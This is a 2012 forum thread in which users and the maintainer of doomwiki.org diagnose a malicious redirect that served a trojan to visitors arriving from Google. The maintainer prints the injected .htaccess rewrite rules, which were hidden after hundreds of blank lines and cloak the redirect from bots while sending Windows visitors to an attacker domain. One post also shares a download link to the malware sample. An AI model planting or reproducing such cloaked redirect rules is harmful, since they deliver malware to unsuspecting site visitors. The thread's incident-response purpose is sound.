betabox Posted March 5, 2012 Can someone confirm if doomwiki.org is infected? Yesterday, I went to it via google and noticed a sort of redirection to "bankingonbankers" and java was started up. Did a malware scan follow-up. I tried to reproduce, but couldn't. However, some guys from a tech support IRC said that when they went to doomwiki.org, there was an attempted download of some google_org_doomwiki.zip Virustotal indicates it's malware. Maybe there's some malicious script? 0 Share this post Link to post
petePESTILENCE Posted March 5, 2012 You really should run a scan and then check for the same result on other pc's before you start scaring people I was on the wiki only yesterday and I found nothing :/ 0 Share this post Link to post
Maes Posted March 5, 2012 Upgrade your Java JRE: there's a recent well-known vulnerability that enables arbitrary code execution through a malicious Java applet. If you see Java starting for no obvious reason on a page that SHOULD'T have it at all, shut down the browser and kill the java process ASAP. I know for sure it affects releases prior to 1.6u29, while 1.7 should be fine. On the bright side, this method is only used to deliver .exe files, so on Linux even if the download succeeds, it will be asymptomatic. 0 Share this post Link to post
GreyGhost Posted March 5, 2012 Where was I before the forums crashed - better not be anything to do with your malware! (JK) That's not doomwiki.org, it's a fake link. The one I tried (which should have taken me here) is actually a download link for a file called "google_doomwiki.zip" from californiagoldbook.com and contained a variant of the Win32/Kryptic.ZWP trojan (as reported by ESET Smart Security). Californiagoldbook.com redirects to another site called banknews.com who are flogging an e-book on a third site called californiagoldbookonline.com. I wouldn't be surprised if that e-book's infested with malware. The moral of the story is - don't take Google links at face value. 0 Share this post Link to post
EarthQuake Posted March 5, 2012 I too got a suspicious zip file when trying to follow a link to the wiki from Google. The file downloaded was "google_.zip" and contained a "google_.com". Obviously I didn't run the program, but when I clicked the URL again, it took me straight to the site. Nothing weird happened with Java though... Here is the link to the file I downloaded if anyone wants to examine it. Please be cautious: http://speedy.sh/tuYKn/google.zip 0 Share this post Link to post
betabox Posted March 5, 2012 petePESTILENCE said:You really should run a scan and then check for the same result on other pc's before you start scaring people I was on the wiki only yesterday and I found nothing :/ Hi there! Good to see you didn't read my post. I already did scans of my PC and I've asked at a tech support IRC about this. Other people have encountered similar threats there. And no, much to your relief, this isn't a scare tactic. Is the fake link displayed at the bottom of (whichever) browser when you hover the cursor over it on google? Or does it redirect AFTER clicking on the google result? Anyway, it seems my Java version is up to date, but it's not 1.7; unless 1.6u31 is AKA 1.7 0 Share this post Link to post
petePESTILENCE Posted March 5, 2012 Soz man.... Just struck me as odd.... Damn Trojan tricksters 0 Share this post Link to post
gravager Posted March 5, 2012 I clicked a couple google links to the wiki earlier when the thread was new & didn't have any problems.. just tried it again and got the same malicious redirect as you from 2 different ones, shut down by my browser & antivirus (though i'm gonna do some scans & monitor my processes/network activity closely) but afterwards the links worked properly. edit: I was in a hurry to sever my connection & make double sure my comp is clean. posted about things I should probably research first. 0 Share this post Link to post
RestlessRodent Posted March 5, 2012 Did not occur to me at all no matter how many times I tried. Some info on that google_.comgoogle_.com: PE32 executable for MS Windows (GUI) Intel 80386 32-bit * Written with Microsoft Visual C++ 8.0, using C++/CLI. * It is a GUI Application * Calls DeleteCriticalSection, EnterCriticalSection, ExitProcess, FindResourceA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetACP, GetCommandLineA, GetCommandLineW, GetCPInfo, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStrings, GetEnvironmentStringsW, GetFileType, GetLastError, GetLocaleInfoA, GetModuleFileNameA, GetModuleHandleA, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemTimeAsFileTime, GetTickCount, GetVersionExA, HeapAlloc, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSection, InterlockedDecrement, InterlockedIncrement, IsDebuggerPresent, IsValidCodePage, LCMapStringA, LCMapStringW, LeaveCriticalSection, LoadLibraryA, LoadResource, MultiByteToWideChar, QueryPerformanceCounter, RtlUnwind, SetHandleCount, SetLastError, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, WideCharToMultiByte, and WriteFile 0 Share this post Link to post
gravager Posted March 5, 2012 could this be due to a compromised .htaccess file at the doomwiki? Thats probably the leading cause of traffic inbound from a search engine being redirected to some circle of hell... but web design & security is mostly voodoo to me, I just work on PCs. 0 Share this post Link to post
TomoAlien Posted March 5, 2012 Well, It only happens when you click on the link to doomwiki.org on Google, and it only happens once. And I guess gravager is right. Whoever is the admin at Doomwiki.org should do a check on the .htaccess since it does that odd redirect. 0 Share this post Link to post
printz Posted March 5, 2012 I've done a Google search on "doom wiki", scrolled down until I found doomwiki.org and not doom. wikia.com, clicked on the link, nothing special happened. EDIT: looking for "simon fraggle howard" as GreyGhost suggested, I found some results such as "pop.doomwiki.info". Oopsie. Be afraid, be very afraid. 0 Share this post Link to post
gravager Posted March 5, 2012 well I saw it happen twice, & neither of them was the home page link. one of those pop.- links did it to me (I specifically tried it because it looked suspicious), but if I type the URL into my browser it loads the wiki page. I dunno what that prefix is all about. I avoided the crummy wikia site as well. EDIT: ok my pop link didn't end with .info, now that smells like a fake. but typing pop.doomwiki.org in a browser just drops the pop & loads the home page for me. anyway I sent a PM to Quasar earlier. not that I know anyone here but the wiki said he's a maintainer of the server =) he's probably sleeping like normal people though, so if somebody's in direct contact with an admin.... and I guess we can stop testing links to see if we get infected or not. enough lemmings have taken that dive to confirm the rocks down there are nasty. 0 Share this post Link to post
GreyGhost Posted March 5, 2012 gravager said:could this be due to a compromised .htaccess file at the doomwiki? Nothing to do with DoomWiki, it's a fake link that downloads a trojan to your PC, then (maybe, didn't for me) re-directs you to the Wiki.printz said:EDIT: looking for "simon fraggle howard" as GreyGhost suggested, I found some results such as "pop.doomwiki.info". Oopsie. Be afraid, be very afraid. The Google link I used has disappeared, so maybe it's already being filtered out as a known malware site. 0 Share this post Link to post
printz Posted March 5, 2012 GreyGhost said:Nothing to do with DoomWiki, it's a fake link that downloads a trojan to your PC, then (maybe, didn't for me) re-directs you to the Wiki.Maybe your link didn't have a &redirect=no clause in the URL... I'm getting a pop.doomwiki result in the fifth find entry. 0 Share this post Link to post
gravager Posted March 5, 2012 well this is just really confusing. if there's fake links, they're really good. if i google doomwiki.org, the top link is to doomwiki.org, but that link sets off alarms. more experimenting: it does this exactly once, then it keeps bringing me to doomwiki. but i restart my browser (clears all my cookies & cache) and it happens again. I've got hella slow internet, so I took time to read the messages in the status bar. instead of "sending request to doomwiki.org" it redirects to "sending request to ####.kingoftheaquarium.com", thats 4 varying numbers up front. stopped loading before I received enough data to set off my antivirus. I close the tab and open the same link again, it takes me to Doomwiki. so I'm still thinking it could be the htaccess thing. 0 Share this post Link to post
Gez Posted March 5, 2012 Looks to me like it's Google that's infected. The way it operates, when you click a link, it actually sends you to a redirect. That way, it can count clicks and know which sites are accessed from which queries, and which type of searches you make, and all the rest of the Big Brotherian stuff. Then it uses JavaScript to hide the actual links in the status bar, and replace them with where they then redirect you. For example, this:DoomWiki.org, the new home of the Doom Wiki - Doom, Heretic ... Welcome to the ultimate Doom Wiki, a community-driven project to document everything related to id Software's classic games Doom and Doom II, as well as ... doomwiki.org/ - Cached - Similar The link says http://doomwiki.org/ when you hover over it. If you look at the source of the page, however, you'll see something different:<li class="g"> <h3 class="r"> <a href="/url?q=http://doomwiki.org/&sa=U& ei=LoRUT_GnM8HW0QXpw7jXBw&ved=0CBAQFjAA& usg=AFQjCNFPoLR3C0p93WAu3Vxjfe5NuTveVw"> <b>DoomWiki</b>.<b>org</b>, the new home of the Doom Wiki - Doom, Heretic <b>...</b> </a> </h3> <div class="s">Welcome to the ultimate <b>Doom Wiki</b>, a community-driven project to document <br> everything related to id Software's classic games Doom and Doom II, as well as <b>...</b><br> <div> <cite><b>doomwiki</b>.<b>org</b>/</cite> <span class="flc"> - <a href="//webcache.googleusercontent.com/search?sclient=psy-ab&hl=en&site=& btnK=&q=cache:Q8jS6IXZ_6UJ:http://doomwiki.org/+doomwiki.org&ct=clnk">Cached</a> - <a href="/search?sclient=psy-ab&hl=en&site=&btnK=&tbo=1& q=related:http://doomwiki.org/+doomwiki.org&sa=X">Similar</a> </span> </div> </div> </li> 0 Share this post Link to post
GreyGhost Posted March 5, 2012 You may be right. gravager said:if i google doomwiki.org, the top link is to doomwiki.org, but that link sets off alarms. more experimenting: it does this exactly once, then it keeps bringing me to doomwiki. but i restart my browser (clears all my cookies & cache) and it happens again. Oddly enough, the first time I click on any Google link to DoomWiki (after clearing the browser cache and history) I'm taken to the browser's default home page. Not sure what's going on there. Fortunately I took a screenshot first time around when ESET flagged the trojan, so maybe someone hear can make more sense of the object URL than I have. 0 Share this post Link to post
printz Posted March 5, 2012 Gez said:Looks to me like it's Google that's infected.Did someone hack Google? Was it a protest? EDIT: Does anyone know what malware files are automatically downloaded? I want to see if I have been infected. 0 Share this post Link to post
GreyGhost Posted March 5, 2012 Most likely the Russian Mafia seeking to grow their botnets, or Google have unofficially turned evil. 0 Share this post Link to post
Maes Posted March 5, 2012 Gez said:If you look at the source of the page Soon that will be criminalized in one way or another. 0 Share this post Link to post
Porsche Monty Posted March 5, 2012 Maes said:Soon that will be criminalized in one way or another. No chance, but I'm guessing someone will figure out an efficient way to obscure it. 0 Share this post Link to post
Quasar Posted March 5, 2012 It's the DoomWiki that has been infected, and it has most likely happened because we are still stuck on the obsolete 1.16.2 version of MediaWiki which is known to have at least one serious exploit. This code has been injected into the .htaccess file, after about 300 pages of linebreaks:<IfModule prefork.c> RewriteEngine On RewriteCond %{REQUEST_METHOD} ^GET$ RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.$ RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC] RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC] RewriteCond %{HTTP_COOKIE} !^.*xjV.*$ [NC] RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC] RewriteCond %{HTTPS} ^off$ RewriteRule ^(.*)$ http://%{REMOTE_PORT}.kingoftheaquarium.com/url?sa=X&source=web&cd=20&ved=0oHmRGpyT&url=ht$ </IfModule> #1966ab4f167aa00d6a7a832bb0e5bacd5111a101acd601af7f78bde9 0 Share this post Link to post
gravager Posted March 5, 2012 boom! the old linebreak zerg trick. anyway, speaking of google exploits, I read yesterday they were handing out $20-60k prizes for anyone who can mess with Chrome. I thought that could have backfired somehow... getting attention from the wrong people, etc 0 Share this post Link to post
printz Posted March 5, 2012 Good to know the problem source has been narrowed. 0 Share this post Link to post
NiTROACTiVE Posted March 5, 2012 I think some of the advertisements may have viruses, because sometimes when I stay on a page on deviantART, my anti-virus software tells me that something harmful came up, and a rouge anti-virus would get on my computer, but I got it removed. So yeah, whenever something comes up as a threat, I use a program to scan for any threats and remove them. 0 Share this post Link to post
hex11 Posted March 5, 2012 Why even bother at all with all this fancy-schmancy java(script) stuff anyway? The WWW works just fine with simply HTML+CSS, and no arbitrary code execution vectors. All this needless extra complexity only breeds security holes. KISS - you'll learn this lesson eventually the hard way, or you can learn now the easy way. 0 Share this post Link to post
Manc Posted March 5, 2012 NitroactiveStudios said:I think some of the advertisements may have viruses, because sometimes when I stay on a page on deviantART, my anti-virus software tells me that something harmful came up, and a rouge anti-virus would get on my computer, but I got it removed. There are no ads on doomwiki.org. The mess has been cleaned up, we're updating the source base and developing an action plan to prevent this from happening in the future. 0 Share this post Link to post
Quasar Posted March 5, 2012 hex11 said:Why even bother at all with all this fancy-schmancy java(script) stuff anyway? The WWW works just fine with simply HTML+CSS, and no arbitrary code execution vectors. All this needless extra complexity only breeds security holes. KISS - you'll learn this lesson eventually the hard way, or you can learn now the easy way. Tell me when you write a MediaWiki replacement that runs without any server-side scripting or server-side database, and is served off a vaporware web server that doesn't have server-side configuration files... 0 Share this post Link to post